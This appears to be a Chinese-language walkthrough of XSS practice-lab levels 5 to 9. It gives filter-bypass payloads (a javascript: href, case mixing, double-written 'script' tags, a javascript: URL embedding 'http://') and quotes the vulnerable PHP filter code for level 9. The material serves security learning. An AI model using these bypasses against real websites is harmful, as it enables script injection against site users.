1.level 5
尝试一下
script中间加了_
onclick也被过滤掉了
加一个超链接标签
"><a href=javascript:alert(1)>
2.level 6
试几个
script中间加了_
超链接也没有用
尝试一下大小写:
"<Script>alert(1)</Script>
过了
3.level 7
script被滤掉了
onclick也被滤掉on了
双写几种试试:
onclick不行
script
"><scrscriptipt>alert(1)</scrscriptipt>
4.level 8
随便试几个:
都没解决
点击友情链接
5.level 9
还是都解决不了
查看一下源码
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
}
else
{
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
字符串中必须含有:http://
注释:
strpos($str7, 'http://')
是 PHP 语言中的一个函数调用,用于查找子字符串 'http://'
在另一个字符串 $str7
中的位置。
$str7
是你想要搜索的主字符串。'http://'
是你想要查找的子字符串。
strpos
函数返回子字符串在主字符串中首次出现的位置(索引)。如果子字符串不存在于主字符串中,strpos
将返回 false
。
javascript:alert('1http://')